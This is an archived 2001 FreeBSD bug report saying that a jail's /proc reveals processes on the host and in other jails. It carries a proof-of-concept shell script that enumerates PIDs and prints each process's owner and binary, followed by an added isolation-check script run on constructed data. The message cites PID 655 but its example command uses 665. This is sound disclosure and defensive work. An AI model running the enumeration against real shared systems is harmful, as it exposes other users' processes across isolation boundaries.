Date: Mon, 29 Oct 2001 11:31:53 +0100
From: oPr <opr@bsdaemon.be>
To: freebsd-bugs@freebsd.org
Subject: Fw: jail's /proc
Message-ID: <20011029113153.7ef38ebe.opr@bsdaemon.be>

Hello,

I really have no clue if I should mail this to you guys, but we've found some issues in the jail's /proc. We were able to find information about processes running outside the jail, or running in other jails.

E.g. when I run sshd in the host system, and it has PID 655, I can log in on the jail, and by executing "ls -l /proc/665/file" I can see what binary is running on PID 655. So any user of the jail system can see what processes you run on that server.

I'm running FreeBSD 4.4-RELEASE on an i386.

greetz,
Pieter Danhieux

Proof of concept shellscript:

#!/bin/sh
# Walk the PID range and report every /proc/<pid>/file visible from inside the jail.
_COUNT=0;
while [ $_COUNT -le 65000 ]; do
    if [ -f /proc/$_COUNT/file ]; then
        # Owner and binary path are taken from the "ls -l" output of the entry.
        _USER=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f4`;
        _PROC=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f14`;
        echo "PID= $_COUNT USER= $_USER PROC= $_PROC";
    fi
    _COUNT=`expr $_COUNT + 1`;
done

----------------- [www.bsdaemon.be] -----------------
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011029113153.7ef38ebe.opr>
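
The report above can be turned into an isolation check. The following is an added example, not part of the original message: `foreign_pids` is a hypothetical helper that takes a procfs mount point and a file listing the PIDs the administrator knows belong to the jail, then reports every other PID visible there. The demo runs against a constructed directory tree, not a real /proc.

```shell
#!/bin/sh
# Added example (not from the original post): jail procfs isolation check.
# foreign_pids PROC_ROOT ALLOWED_FILE
#   PROC_ROOT    - procfs mount point as seen from inside the jail
#   ALLOWED_FILE - one PID per line; assumed to be supplied by the administrator
# Prints "PID TARGET" for every visible PID that is not in ALLOWED_FILE.
# Returns 0 when nothing foreign is visible, 1 otherwise.
foreign_pids() {
    proc_root=$1
    allowed=$2
    leaked=0
    for entry in "$proc_root"/[0-9]*; do
        # /proc/<pid>/file may point at a binary that does not exist inside
        # the jail, so accept a dangling symlink as well as a regular entry.
        [ -e "$entry/file" ] || [ -L "$entry/file" ] || continue
        pid=${entry##*/}
        case $pid in *[!0-9]*) continue ;; esac   # skip non-numeric names
        if ! grep -qx "$pid" "$allowed"; then
            target=$(readlink "$entry/file" 2>/dev/null || echo unknown)
            printf '%s %s\n' "$pid" "$target"
            leaked=1
        fi
    done
    return "$leaked"
}

# Demo on constructed data: PID 101 belongs to the jail, PID 655 (sshd on the
# host, as in the report) does not.
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/proc/101" "$d/proc/655" "$d/proc/curproc"
    ln -s /bin/sh "$d/proc/101/file"
    ln -s /usr/sbin/sshd "$d/proc/655/file"
    printf '101\n' > "$d/allowed"
    if foreign_pids "$d/proc" "$d/allowed"; then
        echo "OK: only jail PIDs visible"
    else
        echo "FAIL: processes from outside the jail are visible"
    fi
    rm -rf "$d"
}
demo
```
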